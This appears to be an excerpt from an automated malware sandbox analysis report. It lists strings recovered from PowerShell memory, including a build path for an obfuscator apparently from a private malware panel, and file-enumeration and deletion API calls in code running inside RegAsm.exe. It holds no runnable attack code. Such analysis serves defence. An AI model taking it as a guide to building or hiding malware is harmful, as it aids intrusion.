                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.3263198460.00000000025AD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3352588129.0000000007C01000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ws\System.Core.pdb source: powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: tem.Core.pdb_ source: powershell.exe, 0000000A.00000002.3373832812.0000000006C38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ore.pdb_ source: powershell.exe, 0000000A.00000002.3373832812.0000000006C38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000E.00000002.3372267954.0000000008D00000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: em.Core.pdb, source: powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0044E879 FindFirstFileExA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040783C FindFirstFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
